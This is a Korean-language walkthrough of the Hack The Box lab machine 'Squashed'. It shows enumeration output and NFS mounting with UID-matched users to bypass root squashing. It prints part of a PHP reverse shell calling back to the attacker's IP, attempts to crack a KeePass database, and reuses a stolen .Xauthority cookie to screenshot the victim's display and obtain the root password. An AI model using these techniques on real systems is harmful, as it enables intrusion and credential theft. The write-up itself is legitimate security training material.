[Hack The Box] Squashed 풀이

💡 Hack-The-Box Squashed 풀이 입니다.

문제

Enumeration

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sVC -p - 10.129.86.233 --min-rate 1000 -vv
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-10 10:25 EST
PORT      STATE    SERVICE  REASON      VERSION
22/tcp    open     ssh      syn-ack     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http     syn-ack     Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Built Better
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp   open     rpcbind  syn-ack     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   .. skip
|   
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open     nfs_acl  syn-ack     3 (RPC #100227)
5089/tcp  filtered unknown  no-response
27249/tcp filtered unknown  no-response
39825/tcp open     mountd   syn-ack     1-3 (RPC #100005)
42647/tcp open     nlockmgr syn-ack     1-4 (RPC #100021)
49236/tcp filtered unknown  no-response
51659/tcp open     mountd   syn-ack     1-3 (RPC #100005)
53596/tcp filtered unknown  no-response
59311/tcp open     mountd   syn-ack     1-3 (RPC #100005)
64476/tcp filtered unknown  no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 85.90 seconds

주요하게 볼 서비스는 http(80), NFS(2049) 포트 입니다.

HTTP

사이트 자체에 살펴볼 포인트가 딱히 보이지가 않습니다. gobuster 를 사용하여 숨겨진 페이지가 있는지 확인해 봅니다.

┌──(root㉿kali)-[/home/kali/Desktop]
└─ gobuster dir -u http://10.129.86.233/ -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.86.233/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/02/10 11:05:37 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/css                  (Status: 301) [Size: 312] [--> http://10.129.86.233/css/]
/images               (Status: 301) [Size: 315] [--> http://10.129.86.233/images/]
/index.html           (Status: 200) [Size: 32532]                                 
/js                   (Status: 301) [Size: 311] [--> http://10.129.86.233/js/]    
/server-status        (Status: 403) [Size: 278]                                   
                                                                                  
===============================================================
2023/02/10 11:06:14 Finished
===============================================================
                                                                   

살펴볼 지점은 /server-status 페이지가 403 Forbidden 이라는 점 말고는 특별한 결과가 나오지 않았습니다.

NFS

┌──(kali㉿kali)-[~/Desktop]
└─$ showmount -a 10.129.86.233 
All mount points on 10.129.86.233:
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop]
└─$ showmount -e 10.129.86.233
Export list for 10.129.86.233:
/home/ross    *
/var/www/html *

/home/ross , /var/www/html 디렉터리 2개가 export 되어있는 것을 볼 수 있습니다. NFS 파일시스템으로 마운트 한 뒤, 그 구조를 살펴봅니다.

mkdir -p mnt/ross
mkdir -p mnt/html
cd mnt

mount -t 10.129.86.233:/home/ross ross
mount -t 10.129.86.233:/var/www/html html

마운트 하고 그 구조를 살펴보면 각각의 디렉터리에 권한이 uid 2017, uid 1001로 되어 있습니다.

┌──(root㉿kali)-[/home/kali/Desktop/mnt]
└─ls -al
total 16
drwxr-xr-x  4 root root     4096 Feb 10 11:21 .
drwxr-xr-x 11 kali kali     4096 Feb 10 11:19 ..
drwxr-xr--  5 2017 www-data 4096 Feb 10 11:20 html
drwxr-xr-x 14 1001     1001 4096 Feb 10 10:20 ross

NFS 서비스 특성상 root squashed가 되어있을 확률이 크기 때문에 최대 권한을 얻기 위해서 각각 uid 2017, uid 1001의 사용자를 만들어서 파일에 접근을 시도합니다.

useradd -u 1001 user1001
useradd -u 2017 user2017

먼저 user2017의 권한으로 접근하여 /var/www/html폴더의 구조를 확인합니다.

user2017@kali:/home/kali/Desktop/mnt/html$ tree
.
├── css
│   ├── animate.min.css
│   ├── bootstrap.css
│   ├── bootstrap.css.map
│   ├── bootstrap-grid.css
│   ├── bootstrap-grid.css.map
│   ├── bootstrap-grid.min.css
│   ├── bootstrap-grid.min.css.map
│   ├── bootstrap.min.css
│   ├── bootstrap.min.css.map
│   ├── bootstrap-reboot.css
│   ├── bootstrap-reboot.css.map
│   ├── bootstrap-reboot.min.css
│   ├── bootstrap-reboot.min.css.map
│   ├── default-skin.css
│   ├── font-awesome.min.css
│   ├── icomoon.css
│   ├── jquery.fancybox.min.css
│   ├── jquery.mCustomScrollbar.min.css
│   ├── jquery-ui.css
│   ├── meanmenu.css
│   ├── nice-select.css
│   ├── normalize.css
│   ├── owl.carousel.min.css
│   ├── responsive.css
│   ├── slick.css
│   └── style.css
├── images
│   ├── banner-bg.png
│   ├── bg-1.png
│   ├── contact-bg.png
│   ├── fb-icon.png
│   ├── footer-logo.png
│   ├── header-bg.png
│   ├── icon-1.png
│   ├── icon-2.png
│   ├── icon-3.png
│   ├── icon-4.png
│   ├── img-1.png
│   ├── img-2.png
│   ├── img-3.png
│   ├── img-4.png
│   ├── img-5.png
│   ├── img-6.png
│   ├── img-7.png
│   ├── img-8.png
│   ├── img-9.png
│   ├── instagram-icon.png
│   ├── left-arrow.png
│   ├── linkedin-icon.png
│   ├── logo.png
│   ├── quote-icon.png
│   ├── right-arrow.png
│   ├── search-icon.png
│   └── twitter-icon.png
├── index.html
└── js
    ├── bootstrap.bundle.min.js
    ├── custom.js
    ├── jquery-3.0.0.min.js
    ├── jquery.mCustomScrollbar.concat.min.js
    ├── jquery.min.js
    ├── plugin.js
    └── popper.min.js

웹사이트 폴더로 확인이 됩니다. 따라서 해당 폴더에 쓰기 권한이 있으므로 웹쉘을 업로드 하면 일반사용자 쉘을 획득 가능합니다.

웹쉘은 깃허브에 있는 페이로드를 참고하였습니다.

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.48';  // Kali linux IP
$port = 4444;       // Listening Port
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

.. 생략

이렇게 하여 일반사용자 권한 획득이 가능합니다.

그 다음으로 root 권한을 위한 권한 상승이 필요합니다.

아까 mount 하고 살펴보지 않았던 /home/ross 파일을 살펴봅니다.

$ cd ross
$ tree
.
├── Desktop
├── Documents
│   └── Passwords.kdbx
├── Downloads
├── Music
├── Pictures
├── Public
├── Templates
└── Videos

tree의 결과로 보면 Passwords.kdbx 파일이 존재합니다. 키패스 라는 소프트웨어에서 사용하는 데이터베이스 파일로 보입니다. 구글링 결과 johntheripper를 통해서 크래킹 시도가 가능할 것으로 보여서 시도해 보았습니다.

$ keepass2john Passwords.kdbx >> Keepasshash.txt
 Passwords.kdbx : File version '40000' is currently not supported!

해당 메시지 내용을 구글링 해보니, 현재 johntheripper는 keepass 3.1까지만 지원하여 크래킹 시도가 불가능 할 것으로 보입니다.

$ ls -al
total 68
drwxr-xr-x 14 user1001 user1001 4096 Feb 10 10:20 .
drwxr-xr-x  4 root     root     4096 Feb 10 11:21 ..
lrwxrwxrwx  1 root     root        9 Oct 20 09:24 .bash_history -> /dev/null
drwx------ 11 user1001 user1001 4096 Oct 21 10:57 .cache
drwx------ 12 user1001 user1001 4096 Oct 21 10:57 .config
drwxr-xr-x  2 user1001 user1001 4096 Oct 21 10:57 Desktop
drwxr-xr-x  2 user1001 user1001 4096 Oct 21 10:57 Documents
drwxr-xr-x  2 user1001 user1001 4096 Oct 21 10:57 Downloads
drwx------  3 user1001 user1001 4096 Oct 21 10:57 .gnupg
drwx------  3 user1001 user1001 4096 Oct 21 10:57 .local
drwxr-xr-x  2 user1001 user1001 4096 Oct 21 10:57 Music
drwxr-xr-x  2 user1001 user1001 4096 Oct 21 10:57 Pictures
drwxr-xr-x  2 user1001 user1001 4096 Oct 21 10:57 Public
drwxr-xr-x  2 user1001 user1001 4096 Oct 21 10:57 Templates
drwxr-xr-x  2 user1001 user1001 4096 Oct 21 10:57 Videos
lrwxrwxrwx  1 root     root        9 Oct 21 09:07 .viminfo -> /dev/null
-rw-------  1 user1001 user1001   57 Feb 10 10:20 .Xauthority
-rw-------  1 user1001 user1001 2475 Feb 10 10:20 .xsession-errors
-rw-------  1 user1001 user1001 2475 Dec 27 10:33 .xsession-errors.old

다시 다른 접근법을 찾아보니, .Xauthority 파일이 눈에 띕니다. X11을 이용하면 원격 디스플레이에 접근이 가능합니다. 따라서 이를 이용하여 접근 가능한 디스플레이에 접근을 시도해 봅니다.

우선 현재 /home/ross 폴더에서의 .Xauthority 파일이므로 ross 계정이 접속하여 있고, X윈도우 환경으로 화면을 보고 있다면 이 파일을 통해서 해당 계정의 디스플레이로 접근이 가능합니다.

획득한 쉘에서 w 명령어로 확인해보면 다음과 같이 ross 계정이 접속하여 있음을 알 수 있습니다.

다음의 과정을 통해서 .Xauthority 인증을 하고, 화면 정보를 읽어올 수 있습니다.

# in kali machine
$ cat .Xauthority | base64
AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABDdylLf287BoiIFuDv67apd

# in target machine
$ echo "AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABDdylLf287BoiIFuDv67apd" | base64 -d > /tmp/.Xauthority
$ export XAUTHORITY=/tmp/.Xauthority
$ xwd -root -display :0 > /tmp/screen.xwd

# root: select root window
# display: specify server to connect to

0번 디스플레이 화면이 screen.xwd 파일로 저장이 됩니다. 해당 파일을 칼리리눅스로 옮겨 온뒤, convert 명령어로 png 파일로 변환하면 다음과 같이 캡쳐된 화면을 볼 수 있습니다.

convert screen.xwd screen.png

화면의 내용은 keepass 프로그램을 통해서 비밀번호를 관리하는 화면이고, 해당화면을 통해서 root 계정의 비밀번호를 획득하는 시나리오 입니다.